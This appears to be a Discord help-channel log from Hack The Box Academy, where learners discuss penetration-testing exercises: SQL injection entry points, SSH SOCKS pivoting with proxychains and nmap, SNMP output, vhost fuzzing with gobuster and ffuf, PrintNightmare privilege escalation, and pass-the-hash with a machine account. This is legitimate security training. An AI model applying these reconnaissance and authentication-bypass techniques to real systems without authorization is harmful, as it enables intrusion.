I am starting by trying to confirm that the page is vulnerable to injection by using characters such as " ' ) etc. into where the application allows input

I am not able to get the page to respond in a different way. So I am wondering do I need to perhaps fuzz for other pages or are there other ways to identify an injection entry point?

Module yara and sigma, an s is missing, found more typos along the way but didnt keep track of them in case any of the staff cares

Hi guys i<m in the module of setting up in the part of organization at Logging . i need to replace PS1 variable in .bashrc for the one they suggested so i can have the date and time. When i check in the .bashrc there like 3-4 PS1 variable. which one i need to change if it is not all ?

post in #1234357888114364508

What is the reason for including the -sV and -sC flags here? Aren't they already included in -A?

Yes they are, just don't overthink these kind of stuff too much lol.
The writer is probably used to write it this way.

Good catch, it's good you're questioning stuff like this.

end of module skills assessment in SQL Injection. I'm not able to find the SQLi entry point... any hints?

I've tried the special characters such as "' " ) # etc. but I don't get a different response from the page

Is that the login page?

yes sir

Have you tried any bypass techniques?

not yet

i figured I would just try to identify the sql injection parameter first

ok i'll try some bypass

but just for my understanding. if it's vulnerable to an auth bypass injection should it not reveal the injection point just by inserting a "'" or something?

or is this a case that i'm not gettng feedback from the page

?

I am in the section: Remote/Reverse Port Forwarding with SSH
I am trying to discover the Windows host with proxychains and nmap. But I can not find it. I've done this: sudo ssh -D 9050 ubuntu@10.129.110.197
and
proxychains nmap -v -Pn -sV 172.16.5.19
The output says the the host is down, no services are running. But that is no true because I am logged in via remote desktop.
By the way I can not copy and paste image on the chat

you use sudo with proxychains

So i'm on pretty sure the last part of the footprinting hard lab, i have toms access to the mysql database, i have been looking through tables and databases with the mysql commands but I am having trouble finding the info i need for the HTB, can anyone nudge me a bit?

Yes

Sorry had to get back to work. Yeah not always going to get an error or any information to leak out.

Hi thx. Appreciate the response. Managed to complete the module. Thanks for comdiemiming

Confirming

So sometimes we just gotta try stuff see if it works with n9 feedback

Yeah IMO your methodology was good. Just for that one, since it is a login page, I would continue to test by trying various bypass methods.

Ok got it thx

I'm moving slowly but surely along the path

61%

Attacking AD was massive

I am having a bitch of time with the RDP and SOCKS Tunneling with SocksOverRDP module exercise. I get the proxy set up, tunnels are up, RDP connects and starts loading the user's desktop and then quits with "Your Remote Desktop Services session has ended." Defender is off, firewall is off. Patience is off. Any suggestions?

would anyone know why it keeps saying incorrect ? The question is "Which kernel release is installed on the system? (Format: 1.22.3)". We just need to put "uname -r" for it right?

should be, minus anything not a version number

make sure you're ssh into the system

my VM gives me shows this 6.5.0-13parrot1-amd64 but the it keeps saying incorrect

there's a target that's spawned 10.129.x.x (note the target and pwnbox are different things)

yeah that's the pwnbox, NOT the target

the pwnbox is subject to change versions as new releases come out, this is why they set up a static target

@mortal basin I'm liking this update at least to this particular question, definitely makes it a bit more user friendly (if only a little bit) though i do think that the RegEx section should be before it though at least IMO since filtering and such for it is a bit easier with regexp, not impossible without it though.
Reason before why it seemed bullshit (in my opinion) is that it didn't make it clear that you only wanted the https://www.inlanefreight.com links, thus leading to some digging around for extraneous links to other domains to filter them out and why I recommend a wonderful solution i found on the forum which actually broke down the series of piped commands

take out the -generic

just the numbers are required

Thank you! It worked

https://tenor.com/view/every-time-60percent-60percent-of-the-time-it-works-every-time-anchorman-gif-4630682

as a general tip for answering questions

• if you copy/paste make sure no additional whitespace characters
• try refreshing the page if you're sure the above has no additional whitespace
• double check that you did steps correctly
• be confused
• try again and it works™️

If Marcie got a dollar for every time they were right, and I’d get 1%. I’d be a millionaire

also make sure that if there is a (format:a.bb.cc) that you follow that format

if the format doesn't include a - or anything, you don't either

thanks sparkling <3

solid advice

I honestly don't recall if I even did it via the taught method. I know I would have tried it, but if it wasn't working, I would have just done it my own way.

Hello there 😄
Does anyone understand this snmp stuff?

Simple Network Management Protocol; it's used to monitor and manage devices

but what's your actual question i'm assuming it's gonna be related to the Footprinting - SNMP module/section?

https://en.wikipedia.org/wiki/Simple_Network_Management_Protocol

Yes its related to the Footprinting section. Let me type it out ...

So what I do understand:

• Used for monitoring and managing devices
• Osi layer 7 and communication done via UDP on Port 161
• The OID (Object Identifier) is a globally unique number by some registry
• MIB (Management Information Base) text file with all queriable SNMP Objects

What I don't really get:

• What does this Footprinting really provide me -> I don't really really get what the SNMP is providing me

For example:
iso.3.6.1.2.1.1.6.0 = STRING: "InFreight SNMP v0.91"
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The SNMP Management Architecture MIB."
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The MIB for Message Processing and Dispatching."
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The management information definitions for the SNMP User-based Security Model."
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "View-based Access Control Model for SNMP."
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing TCP implementations"
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing IP and ICMP implementatio

How should I understand those Entries. Is the left one just the OID which is written out on the wright side?

Sorry if the question is a bit blurry, but I can't really grasp the concept yet

OID = PROPERTY: Value

Aha... so the list provided above are all the oid's

note how they all start with iso.3.6.1.2.1.1 ?

Yes, this is because of the hierarchical stuff right?

that iso.3.6.1.2.1.1 is where the device is, everything after is informational

the 6.0 ending is just the version
the 9.1.3.x is sequential output text

basically everything that lives on that device will start at point X and activity on the device will subsequently logged in some form, anything that is sequential or related will be logged under the same end or continue off the same number

Ahaaa, alright that makes a lot of sense. But how do you know where the "cut" is. Can you just say in general its the first 6 digits?

typically first 6. the syntax they provide for braa is basically it

AAaahhhhh I think I finally got it.

Let me try the exercise one more time. Btw, thank you very much for your help all the time. You are the MVP

Hi guys, i'm very stuck on Module: Bypassing Flawed Validation. I don't know what to do to complete this module, ive tried for days all of what is said on the course

Does HTB offers some kind of help?

Is it HTB or HTB Academy?

Academy

that looks like a section name, not a module name

Don't you also have this button at the bottom of the section?

I mean this provides you the solution If you struggle

that's only if you have an annual sub

I have not solved it myself, but just scrolling through it I would say it looks quiet decent

Ahaaa

so @ember copper , I would say time get the sub haha

i would say avoid using the solution unless you're stuck

session name, right

section name is what you provided, not the module

yes

what's the module name

This is the module Abusing HTTP Misconfigurations

i haven't done that module as it's tier 3 but in order for others to assist you at bare minimum

• state what you've tried (avoiding spoilers, being broad is ok)
• state any errors you got when you tried something (if you copy/paste redact anything that would have been fuzzed/found)
• wait patiently for someone to answer

i need to spoof The Host header to looks localhost... i tried all the tricks

Thanks

there's no official help source for skill issues

but this is as close as you're getting since it seems like they're retiring the forum at some point

I saw today that there was a podcast with answers for questions about some stuff, i didnt undestand if it was about the challanges or about the courses in general

it's just general questions; if you're referring to the cube talks thing

exactly that... oh, i was hopefull

Long time ago only one guy also posted that he was struggling with this session, but I think is forbid to dm the person

anyway since it's a tier 3 module once someone picks up to help you, it'll have to be taken to dm if it's a discussion on how to solve it and not a general hint

server rules

(as if anyone reads them anyway)

some people have their dms turned off for the above reason that they get unsolicited dms

Hi everyone 👋 I'm having trouble with a module. The objective is to identify the services running on the server, and then try to search to find an exploit to exploit a service. Once you do, try to get the content of the '/flag.txt' file. I have found all of the services and versions, however I'm not finding any exploits for them when searching on ExploitDB / MSF. Below is all the Services I've found on the host.

**SSH Services: **
Port 22: OpenSSH 9.2p1 (Debian 2+deb12u3)
Port 31373: OpenSSH 8.9p1 (Ubuntu 3ubuntu0.10)
Port 37888: OpenSSH 8.2p1 (Ubuntu 4ubuntu0.1)
Port 38773: OpenSSH 8.2p1 (Ubuntu 4ubuntu0.1)
Port 42222: OpenSSH 8.2p1 (Ubuntu 4ubuntu0.1)
Port 43471: OpenSSH 8.2p1 (Ubuntu 4ubuntu0.1)

Web Servers:
Apache httpd (multiple versions from 2.4.18 to 2.4.62) on various ports (e.g., 30216, 30835, 31494, 33215, 33316, etc.)
Nginx (multiple versions) on ports like 31890, 32489, 33215, 33645, 34884, etc.
Werkzeug (Python) on ports 35255, 42810
Node.js Express framework on ports 34309, 38926, 41101
Golang net/http server (Go-IPFS or InfluxDB) on ports 9962, 10256, 37423

**Database: **
MySQL service on port 43955

**Other Services: **
RPCbind (Port 111)
Nagios NSCA on ports 30253, 36403
DAAP (mt-daapd) on port 4240

you're overlooking something very important; the module gives you an IP:PORT. that is your ONLY scope

this looks like a public IP that you tried to nmap (which will quickly get you nowhere)

Thanks thats actually super helpful!! lol, indeed I only scanned the IP and didn't include port

it also helps to provide the module and section you're working on

Okay I'll make sure to do so in the future, this was Getting Started/Public Exports Module/Section if anyone is curious.

Thanks again!

yeah you're way overcomplicating it

also as a general tip; i always try going to http://ip:port when presented with a public IP

since most of the time it's a web service

Still struggling on this, any help would be appreciated. thank you in advance

tom is the first user you find yeah? if so there may be more steps to consider

Think about what information you would like to have as a pentester.

@fathom pendant thanks a lot I got my flag and completed the module 🐐

yes the first user, i was able to mysql in as that user after looking at the bash history

so am i on the right path as far as looking through the db as tom? i saw another user while traversing while i was logged in via snmp

but couldn't do anything with it

Yes, you are on the right track with the database.

okay i'll keep digging

ah i just ran through this it's actually a lot simpler if you know how to do mysql query statements

Hello guys. Glad to be here.
Can you help me out with something.
On the starting point Fawn task 7 (What is the command we need to run in order to display the ‘ftp’ client help menu?) I enter: ftp -h this should be the right answer I tried different things but keep coming with red flag and idk what to do

the where <column> = 'string' portion can be helpful

Need some help on Injection Attacks > XPath - Blind Exploitation. I tried to exfiltrate the entire XML schema but couldn't getting anything other than
<accounts>
<acc>
<username>username</username>
<password>password</password>
</acc>
<acc>
<username>username</username>
<password>password</password>
</acc>
</accounts>

Not sure what did i miss

#starting-point read and follow #welcome to access

i did this one

dm me

Sent

if you need help dm me at the point you're stuck at and maybe i can unstuck ya a bit

ik you're in the db but i wanna know what's sticking ya

Hi everyone.I'm at the Attacking web applications with ffuf module and directory fuzzing. There is an example command here:ffuf -w /opt/useful/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ where what comes after the -w is a worldlist. My question is that from where does the htb get this worldlist? Because everytime i try to use this worldlist to complete the challenge ffuf says that file or directory does not exist!

it's just a general wordlist that's used and i can nearly guarantee that most of the time the directory should exist

but if i just simply create a txt file that i don't get any results from ffuf.

the wordlist is from the seclists repo

https://github.com/danielmiessler/SecLists/tree/master

ahh i understand now

thanks 🙏

Automatic verification failed. Please contact support.

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

discord isn't support

I did not post this . I no idea why it is posted. I was searching for something.

¯_(ツ)_/¯

Ha! Thank you. I saw a bunch of posts about people having issues with it - some were operator error but others similar to me, which might have been operator error but I'm not sure how since the session actually starts.

Yeah it's been awhile, so I'd really have to spin it up and work through it to see what happens on my end. I'll let you know if I do.

No worries. I reviewed the walk-through and believe I was doing everything correctly. Grabbed the flag from there and moved on.

What do you mean identify the it without outside help? Without the guide?

Yeah without the walkthrough

Hey. In the Information Gathering - Web Edition module:

I don't understand what I am supposed to do with the target? Am I supposed to connect to it or something and then perform the zone transfer check for the inlanefreight.htb domain?

I'm pretty sure the section on that priv has numerous priv esc exploits, so there's one way. I have a bunch of ways in my notes. A Google search would work too, hacktricks etc.

Not sure if that's what you mean.

Not exactly, I meant moreso identifying the printnightmare vulnerability. As for exploiting it, I'm sure I could've used some other method fs

I think I understand what you mean though. Windows Priv Esc wasn't covered in the module, so you are wondering how someone would know to go that route. Is that what you mean?

Partially like I understand that exploitation of printnightmare leads to a priv esc which I think they glazed over in the prior modules but I don't really understand how I would have come to the conclusion that the server was vulnerable to the vulnerability in the first place

Looks liek you're just supposed to preform a zone transfer against the IP although it's been sometime since I did that module

Well, for me the first things I always check on a host are my privs, so I would just add that to your methodology.

Using the IP as the name server of the domain?

Yeah I believe so since they've provided you with a dns server

You're right! Thanks man 🙏

It's mentioned that seimpersonateprivilege is often on service accounts and can lead to privesc using exploits like print nightmare. But I 100% agree that it is a bit strange that we're expected to exploit it with basically no info

Maybe I'm missing something here. Can printnightmare be executed with seimpersonation privileges in all situtaions? I thought it was version dependent or at least dependent on what patches are installed on the system

Without extra research there is no way to figure out its vulnerable specifically to print nightmare

And while extra research is good, I thought the entire premise was that everything in the skill assessments is in the modules 😕

I got all of these @acoustic thorn , any clue what I am supposed to give as an answer?
I saw three types of DNS records:
A, SOA, NS

So I put "3" as an answer but doesn't seem to be working.

I'm glad I'm not alone in thinking that it was kind of strange but surely there's a way to come to a more definite conclusion

Unpatched windows print spooler service must be running

Otherwise it can't be exploited

Print nightmare I mean, you can still exploit rogue potato

I guess I'm curious if there's a script that can be used to check for that patch or a lack thereof

I used a different means. You still have to verify certain parameters are met for the exploits.

Nevermind, I got it.

Windows exploit suggester does I think. But why not make your own? 😁

I've got a ways to go ig😭

Good luck with the rest of the skill assessment

I might just need it lol

I can only hope this isn't the standard for the actual exam 😂 either way good practice i suppose

Reviews on the module say that the assessment is particularly difficult so let's hope not

I'm curious, did you exploit a different seImpersonate vulnerability?

Yes

Which if you don't mind my asking. I'm curious what other routes I might've missed

You can DM. I won't give you the answer, but will hopefully get you thinking.

Thanks I would appeciate that

@acoustic thorn careful (even with spoiler text) about revealing info on solving skill assessments

SeImpersonatePriv exploits will depend on the config of the machine

i remember with some blood sweat and tears refactoring the exploit suggester code for 3.9 🙃

they're asking for the total number of retrieved records NOT the types of records on the server(s) you can transfer to

all the A records on available hosts that you can transfer to

If you have gone to AD Modules before going through Windows ones, you will always find something that will get you stuck

I see a lot of people going through more advanced Modules without going through the basic and asking for help after

gonna play devil's advocate, the exploit used was only mentioned - but not showcased or exploited so it's not generally on people's minds

I mean.... Should've gone through Win Privesc then going for AD Enum and Attacks

so it's not necessarily that it wasn't because they didn't go through a basic module of some sort, it's more that when it comes to SeImpersonate, they only mention the various potatoes

win privesc is after ad enum in the pentester path

You mean by the list of Modules in the Path?

it's not until the tail end of the path

yes

I rarely followed those

they're generally in order for a reason.

though I can agree that the privesc modules didn't need to be that far back

i think they spread it so that you're not just stuck on OS stuff the whole time

but meh

/feedback or something

I don't actually think it should be sent for feedback as there isn't only the "job paths". The Local Priv Esc Path in the "Skill Paths" could also be done

also looking at https://academy.hackthebox.com/module/details/143 it doesn't recommend it as a prerequisite module

People tend to just go for the ones in the "Job" list because of the certs and forget to go through the rest in the end

so again, not trying to argue just provided that if it was meant to be a pre-requisite, it's not listed

Good point

and i did find that the privesc stuff really wasn't all too necessary to complete the module as most of the time you were bouncing between windows stuff and basic config searches

if you feel it should be added and the path adjusted by all means suggest /feedback (i understand this may sound snarky, but i am actually being serious)

How would I login with a machine account using nxc? For context, I transferred the krb5.keytab file from a linux machine, dumped it, and now have the machine accounts NT hash.

usually -H usually for hashes

but if you have the keytab file just use that

you'd initialize it with kinit and then most tools that utilize kerberos pre-authentication, use -k as the argument

./ptunnel-ng: error while loading shared libraries: libcrypto.so.3: cannot open shared object file: No such file or directory

did anybody know how to fix this?

I was gonna edit it :)

i suggest not revealing hashes and info for modules above tier 0

I know. I'm not arguing. It's just that I see a lot of people with doubts that could be mitigated by going through the content of other Modules

don't use ptunnel-ng

im using sudo ./ptunnel-ng

you're very much right; i'm eventually gonna refactor my notes and have a vault that's more general with another vault that's just academy

and include the prerequisites from the /details/mod# in an over view/backlink

so what do i use marcielee? in the module there's only this command

the error you're getting is because when it was compiled, for whatever reason, it wasn't compiled with a shared object (so) library

in the pivoting module you can use any pivoting tool you'd like; imo ptunnel-ng was the most frustrating for me

owh icic thanks for the info marcielee, i think i will use shisel

I mean.. I'm just doing the course in order though but I hear you ig lol

My bad, not trying to spoil for anyone else

spoiler text does nothing

as it can either be disabled in settings, or clicked on and read anyway

Totally understand

It is kind of in the name tho haha either way I'll be more considerate of that

I didn't think they were set in a specific order.
I went through the modules as I could unlock them from the cubes for the monthly subs, so I didn't ran any order

I tended to go through subject

people looking to just get answers without actually learning will click it anyway

And went for the AD Modules in sequence

After going for the Privilege Escalation Skill Path

best practice if you're gonna use spoiler text is to use shorthands as well; i.e. first couple letters/characters of something

Ah I see, I didn't think about the order at all tbh. I just started at the top working my way to the bottom lol

i.e. found that Pr* can be used with Se*

@dapper moth but you have some degree of knowledge already before doing academy, so the way you go through it is ultimately gonna be different from how a n00b (like myself and others) would do it

so while your method works for you it isn't the generally recommended method

I do now.... Got most intermediate knowledge from Academy

And boxes

I'm on the Information Gathering - Web Edition module.

Here on the vhost fuzzing section.

I have the tried the following command:

gobuster vhost -u http://94.237.50.242:54943 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain

When using verbose mode I see that it's sending the requests to x.94.237.50.242:54943
I did not get any findings, but I believe it's because I am supposed to send the fuzzed words in the host header, how do I do that with gobuster?

I tried

gobuster vhost -u http://94.237.50.242:54943 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --domain inlanefreight.htb

but when using verbose mode I see that it's just attempting to send requests to the words itself, them not being a url.

You are no noob, @fathom pendant!

to --append-domain it needs a domain to append

So --append-domain inlanefreight.htb?

Still no results, and it's sending it like this...

I think supply inlanefreight.htb instead of the IP address so that when it appends the subdomain it's actually corrrect

I need to use 94.237.50.242:54943, inlanefreight.htb is not responsive

What marcielee said

Have you added it to your hosts file?

Ohh is that how I'm supposed to do it?

Trying

--append-domain --domain inlanefreight.htb

Oh

it requires both flags

There we gooo

Thank you @fathom pendant

i just use ffuf -H "HOST: FUZZ.inlanefreight.htb" ¯_(ツ)_/¯

Ffuf is the only fuzzing tool for me

Yeah well in this module we haven't learned to use ffuf yet, I know I could have used that but I'm just following instructions here

I've learned to supplement module material with additional material, also LLMs are really good

What of Feroxbuster ?

Hi everyone

Yeah I honestly never thought about that, since I already knew about abusing that privilege. It wasn't until someone mentioned it not long ago and I looked back at the module to see it touched on slightly in the privileged access section of the AD module.

lots of links

They seem similar but ffuf syntax is so intuitive

Owwh that true .. I usually avoid FFuF due to it long commands .. but I think it more effective

Fair but: ferox can auto fuzz subdirectories in a dir fuzz

Little harder to do with ffuf

Yea ..cause same result I get in Ferox . It same I will get on ffuf . I only use FFUF for Subdomain and ferox for subdomain directories

ffuf works fine on dirs for me

¯_(ツ)_/¯

I meant recursive dirsearch

Maybe wasnt clear